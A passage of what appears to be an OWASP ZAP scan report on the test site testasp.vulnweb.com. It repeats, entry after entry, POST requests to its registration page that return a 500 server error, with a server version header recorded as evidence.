<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
